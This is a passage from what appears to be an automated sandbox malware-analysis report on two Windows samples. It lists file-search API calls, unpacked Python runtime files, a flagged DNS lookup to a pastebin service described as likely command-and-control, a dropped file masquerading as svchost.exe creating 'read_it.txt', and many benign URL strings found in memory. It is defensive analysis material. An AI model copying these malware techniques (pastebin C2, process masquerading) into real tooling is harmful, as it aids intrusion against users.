                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: 0_2_0004BA74 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0004BA74
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: 0_2_0005D2A0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_0005D2A0
                  Source: C:\Users\user\Desktop\4wx72yFLka.exeCode function: 0_2_0006C358 FindFirstFileExA,0_2_0006C358
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD667E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,2_2_00007FF6DD667E4C
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD6588D0 FindFirstFileExW,FindClose,2_2_00007FF6DD6588D0
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD671EE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00007FF6DD671EE4
                  Source: C:\Users\user\Desktop\Mai.exeCode function: 2_2_00007FF6DD667E4C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,2_2_00007FF6DD667E4C
                  Source: C:\Users\user\Desktop\Mai.exeFile opened: C:\Users\user\AppData\Local\Temp\_MEI76562\ucrtbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeFile opened: C:\Users\user\AppData\Local\Temp\_MEI76562\sqlite3.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeFile opened: C:\Users\user\AppData\Local\Temp\_MEI76562\unicodedata.pydJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeFile opened: C:\Users\user\AppData\Local\Temp\_MEI76562\wheel-0.42.0.dist-info\Jump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeFile opened: C:\Users\user\AppData\Local\Temp\_MEI76562\VCRUNTIME140_1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Mai.exeFile opened: C:\Users\user\AppData\Local\Temp\_MEI76562\VCRUNTIME140.dllJump to behavior

                  Networking

                  barindex
                  Connects to a pastebin service (likely for C&C)
                  Source: unknownDNS query: name: rentry.co
                  Source: Joe Sandbox ViewIP Address: 104.26.3.16 104.26.3.16
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Users\user\AppData\Roaming\svchost.exeFile created: C:\Users\jones\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temporary Internet Files\IE\read_it.txtJump to behavior
                  Source: global trafficDNS traffic detected: DNS query: rentry.co
                  Source: Mai.exe, 00000004.00000002.2724125652.000001995F980000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.../back.jpeg
                  Source: Mai.exe, 00000004.00000003.1545064163.000001995E4D3000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2719416233.000001995EA30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://aka.ms/vcpython27
                  Source: Mai.exe, 00000004.00000003.2229794831.000001995F0B3000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2115362009.000001995E3CD000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2090188958.000001995F08B000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2395743256.000001995F082000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2295052810.000001995F34F000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2103277216.000001995E3C2000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2321410286.000001995F3C9000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2224710184.000001995F07E000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2085371455.000001995F34F000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2281182162.000001995E3D9000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2648357957.000001995E39B000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2374599976.000001995E373000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2277018993.000001995F0BE000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2259146180.000001995E38E000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2237855104.000001995E372000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2298258374.000001995F0C9000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2235940929.000001995F080000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2210787752.000001995F077000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2377161951.000001995E3A8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2205689716.000001995E38C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2349801232.000001995F0CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://blog.cryptographyengineering.com/2012/05/how-to-choose-authenticated-encryption.html
                  Source: Mai.exe, 00000004.00000002.2724125652.000001995F980000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2402286590.000001995F1E2000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2283656673.000001995F1E0000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2187500147.000001995F1DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://bugs.python.org/issue23606)
                  Source: Mai.exe, 00000002.00000003.1473163789.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.co
                  Source: Mai.exe, 00000002.00000003.1472086340.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1472720577.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1471062686.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1473163789.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1470937814.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1471598606.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                  Source: Mai.exe, 00000002.00000003.1472086340.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1472720577.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1471062686.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1473163789.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1470937814.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1471598606.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                  Source: Mai.exe, 00000002.00000003.1472086340.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1472720577.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1471062686.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1473163789.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1470937814.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1471598606.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                  Source: Mai.exe, 00000002.00000003.1472086340.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1472720577.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1471062686.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1473163789.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1470937814.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1471598606.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                  Source: Mai.exe, 00000002.00000003.1473163789.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.cos
                  Source: Mai.exe, 00000004.00000002.2724335316.000001995FAB0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://cffi.readthedocs.io/en/latest/cdef.html#ffi-cdef-limitations
                  Source: Mai.exe, 00000004.00000003.1545696959.000001995E38D000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1542837456.000001995E38D000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2210091841.000001995DD62000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2259146180.000001995E38E000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2205689716.000001995E38C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2289367516.000001995E6E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
                  Source: Mai.exe, 00000004.00000003.2208933769.000001995DF89000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2204751911.000001995DF65000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2310141608.000001995E0D2000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2227171262.000001995E065000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2225151854.000001995DFFB000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2247616159.000001995E067000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2177784313.000001995DF36000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2282469085.000001995E0B4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2223311860.000001995DFF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577916/
                  Source: Mai.exe, 00000004.00000003.2084925482.000001995F4E9000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2084631767.000001995F4A1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2714680779.000001995E3AF000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2259146180.000001995E38E000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2377161951.000001995E3A8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2722924576.000001995F4F3000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2205689716.000001995E38C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
                  Source: Mai.exe, 00000004.00000003.2234050575.000001995DF49000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2430683821.000001995F079000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2563959483.000001995F079000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2650446288.000001995DF4A000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2709341167.000001995DF4A000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2259146180.000001995E38E000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2210787752.000001995F077000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2377161951.000001995E3A8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2218920564.000001995DF37000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2626084561.000001995DF4A000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2205689716.000001995E38C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2177784313.000001995DF36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                  Source: Mai.exe, 00000004.00000002.2707357416.000001995DCB0000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl
                  Source: Mai.exe, 00000004.00000003.2205689716.000001995E38C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl
                  Source: Mai.exe, 00000004.00000003.2084857083.000001995F489000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl
                  Source: Mai.exe, 00000004.00000003.2317848602.000001995E688000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2403793060.000001995E689000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
                  Source: Mai.exe, 00000004.00000003.2084857083.000001995F489000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl
                  Source: Mai.exe, 00000004.00000003.2317848602.000001995E688000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2403793060.000001995E689000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
                  Source: Mai.exe, 00000004.00000003.2084857083.000001995F489000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
                  Source: Mai.exe, 00000004.00000003.2430683821.000001995F079000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2563959483.000001995F079000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2210787752.000001995F077000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
                  Source: Mai.exe, 00000002.00000003.1472086340.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1472720577.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1471062686.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1473163789.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1470937814.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1471598606.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                  Source: Mai.exe, 00000002.00000003.1472086340.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1472720577.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1471062686.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1473163789.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1470937814.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1471598606.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                  Source: Mai.exe, 00000002.00000003.1472086340.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1472720577.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1471062686.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1473163789.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1470937814.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1471598606.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                  Source: Mai.exe, 00000002.00000003.1471598606.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                  Source: Mai.exe, 00000002.00000003.1472086340.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1472720577.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1471062686.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1473163789.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1470937814.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1471598606.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                  Source: Mai.exe, 00000004.00000003.2648357957.000001995E39B000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2259146180.000001995E38E000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2377161951.000001995E3A8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2205689716.000001995E38C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/groups/ST/toolkit/BCM/documents/proposedmodes/eax/eax-spec.pdf
                  Source: Mai.exe, 00000004.00000003.2295052810.000001995F34F000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2085371455.000001995F34F000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2374599976.000001995E373000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2237855104.000001995E372000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2205689716.000001995E31A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38C/SP800-38C.pdf
                  Source: Mai.exe, 00000004.00000003.2395743256.000001995F082000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2321410286.000001995F3C9000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2224710184.000001995F07E000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2235940929.000001995F080000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2210787752.000001995F077000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38D/SP-800-38D.pdf
                  Source: Mai.exe, 00000004.00000002.2724125652.000001995F980000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2639281386.000001995E69F000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2724666844.000001995FC7C000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2402286590.000001995F1E2000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2233000661.000001995E698000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2283656673.000001995F1E0000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2259146180.000001995E38E000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2724335316.000001995FB64000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2377161951.000001995E3A8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2718685846.000001995E6A4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2205689716.000001995E38C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2388248054.000001995E69C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2098719041.000001995E693000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2412439998.000001995F1FF000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2293708650.000001995F154000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2720972495.000001995F16B000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2721420027.000001995F207000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2187500147.000001995F1DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
                  Source: Mai.exe, 00000004.00000002.2720394007.000001995EF70000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.1554271336.000001995F1CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
                  Source: Mai.exe, 00000004.00000002.2719708650.000001995EC30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.kill
                  Source: Mai.exe, 00000004.00000002.2719708650.000001995EC30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.returncode
                  Source: Mai.exe, 00000004.00000002.2719708650.000001995EC30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.terminate
                  Source: Mai.exe, 00000004.00000002.2719934245.000001995ED50000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2719111296.000001995E820000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/library/itertools.html#recipes
                  Source: Mai.exe, 00000004.00000003.2205689716.000001995E31A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/library/unittest.html
                  Source: Mai.exe, 00000004.00000002.2719934245.000001995ED50000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2719416233.000001995EA30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://foo/bar.tar.gz
                  Source: Mai.exe, 00000004.00000002.2719934245.000001995ED50000.00000004.00001000.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2719416233.000001995EA30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://foo/bar.tgz
                  Source: Mai.exe, 00000004.00000003.2147888420.000001995E598000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2206789344.000001995E598000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2322703546.000001995E598000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
                  Source: Mai.exe, 00000004.00000003.2207794122.000001995E5EE000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2276777299.000001995E5EE000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2379937424.000001995E60D000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2296012741.000001995E5EE000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2455637329.000001995E61B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
                  Source: Mai.exe, 00000004.00000003.2317848602.000001995E663000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2115362009.000001995E49A000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2257817585.000001995E528000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2167480812.000001995E4C4000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2220027795.000001995E505000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2136590998.000001995E4BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
                  Source: Mai.exe, 00000004.00000003.2084631767.000001995F4A1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2133333621.000001995F4B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es
                  Source: Mai.exe, 00000004.00000003.2084631767.000001995F4A1000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2133333621.000001995F4B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es0
                  Source: Mai.exe, 00000002.00000003.1472086340.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1472720577.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1471062686.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1473163789.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1470937814.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1471598606.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                  Source: Mai.exe, 00000002.00000003.1472086340.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1472720577.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1471062686.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1473163789.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1470937814.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1471598606.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                  Source: Mai.exe, 00000002.00000003.1472086340.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1472720577.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1471062686.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1473163789.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1470937814.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1471598606.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                  Source: Mai.exe, 00000002.00000003.1472086340.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1472720577.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1471062686.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1473163789.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1470937814.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000002.00000003.1471598606.00000228ED7B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                  Source: Mai.exe, 00000004.00000002.2719934245.000001995ED50000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://opensource.apple.com/source/CF/CF-744.18/CFBinaryPList.c
                  Source: Mai.exe, 00000004.00000002.2707357416.000001995DCB0000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2207794122.000001995E5EE000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2276777299.000001995E5EE000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000002.2721975534.000001995F35C000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2379937424.000001995E60D000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2296012741.000001995E5EE000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2085371455.000001995F354000.00000004.00000020.00020000.00000000.sdmp, Mai.exe, 00000004.00000003.2295052810.000001995F35C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/
